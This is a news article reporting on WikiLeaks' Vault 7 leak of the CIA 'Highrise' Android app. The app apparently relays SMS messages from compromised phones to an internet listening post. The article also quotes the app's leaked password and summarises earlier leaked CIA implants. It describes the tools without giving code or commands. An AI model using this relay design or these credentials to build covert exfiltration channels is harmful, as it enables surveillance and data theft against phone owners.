WikiLeaks has today published the 16th batch of its ongoing Vault 7 leak, this time instead of revealing new malware or hacking tool, the whistleblower organisation has unveiled how CIA operatives stealthy collect and forward stolen data from compromised smartphones.
Previously we have reported about several CIA hacking tools, malware and implants used by the agency to remotely infiltrate and steal data from the targeted systems or smartphones.
However, this time neither Wikileaks nor the leaked CIA manual clearly explains how the agency operatives were using this tool.
But, since we have been covering every CIA leak from the very first day, we have understood a possible scenario and have illustrated how this newly revealed tool was being used.
Explained: How CIA Highrise Project Works
In general, the malware uses the internet connection to send stolen data after compromising a machine to the attacker-controlled server (listening posts), but in the case of smartphones, malware has an alternative way to send stolen data to the attackers i.e. via SMS.
But for collecting stolen data via SMS, one has to deal with a major issue – it is very hard to sort and analyse bulk messages if received from multiple targeted devices.
To solve this issue, the CIA created a simple Android application, dubbed Highrise, which works as an SMS proxy between the compromised devices and the listening post server.
“There are a number of IOC tools that use SMS messages for communication and HighRise is a SMS proxy that provides greater separation between devices in the field (“targets”) and the listening post” by proxying “”incoming” and “outgoing” SMS messages to an internet LP,” the leaked CIA manual reads.
What I have understood after reading the manual is that CIA operatives have to install an application called “TideCheck” on their Android device, which is set to receive all the stolen data via SMS from the compromised devices.
The last known version of the TideCheck app, i.e. HighRise v2.0, was developed in 2013 and works on mobile devices running Android 4.0 to 4.3, though I believe, by now, they have already developed an updated versions that work for the latest Android OS.
Once installed, the app prompts for a password, which is “inshallah,” and after login, it displays three options:
- Initialize — to run the service.
- Show/Edit configuration — to configure basic settings, including the listening post server URL, which must be using HTTPS.
- Send Message — allows CIA operative to manually (optional) submit short messages (remarks) to the listening post server.
Once initialized and configured properly, the app continuously runs in the background to monitor incoming messages from compromised devices; and when received, forwards every single message to the CIA’s listening post server over a TLS/SSL secured Internet communication channel.
Previous Vault 7 CIA Leaks
Last week, WikiLeaks dumped two alleged CIA implants that allowed the agency to intercept and exfiltrate SSH credentials from targeted Windows and Linux operating systems using different attack vectors.
Dubbed BothanSpy — implant for Microsoft Windows Xshell client, and Gyrfalcon — targets the OpenSSH client on various distributions of Linux OS, including CentOS, Debian, RHEL (Red Hat), openSUSE and Ubuntu.
Since March, the whistleblowing group has published 16 batches of “Vault 7” series, which includes the latest and last week leaks, along with the following batches:
- OutlawCountry – An alleged CIA project that allowed it to hack and remotely spy on computers running the Linux operating systems.
- ELSA – Alleged CIA malware that tracks geo-location of targeted computers and laptops running the Microsoft Windows operating system.
- Brutal Kangaroo – A tool suite for Microsoft’s Windows used by the spying agency to target closed networks or air-gapped computers within an organisation or enterprise without requiring any direct access.
- Cherry Blossom – An agency’s framework used for monitoring the Internet activity of the targeted systems by exploiting vulnerabilities in Wi-Fi devices.
- Pandemic – A CIA’s project that allowed the agency to turn Windows file servers into covert attack machines that can silently infect other computers of interest inside a targeted network.
- Athena – An agency’s spyware framework that has been developed to take full control of the infected Windows machines remotely, and works for every version of Microsoft’s Windows operating systems, from XP to Windows 10.
- AfterMidnight and Assassin – Two CIA malware frameworks for the Windows platform that has been designed to monitor activities on the infected remote host computer and execute malicious actions.
- Archimedes – Man-in-the-middle attack tool allegedly developed by the CIA to target computers inside a Local Area Network (LAN).
- Scribbles – Software reportedly designed to embed ‘web beacons’ into confidential documents, allowing the agency to track insiders and whistleblowers.
- Grasshopper – Framework that allowed the CIA hackers to easily create their custom malware for breaking into Microsoft’s Windows OS and bypassing antivirus protection.
- Marble – Source code of a secret anti-forensic framework used by the agency to hide the actual source of its malware.
- Dark Matter – Hacking exploits the spying agency designed to target iOS and Mac systems.
- Weeping Angel – Spying tool used by the CIA hackers to infiltrate smart TVs, transforming them into covert microphones.
- Year Zero – Alleged CIA hacking exploits for popular software and hardware.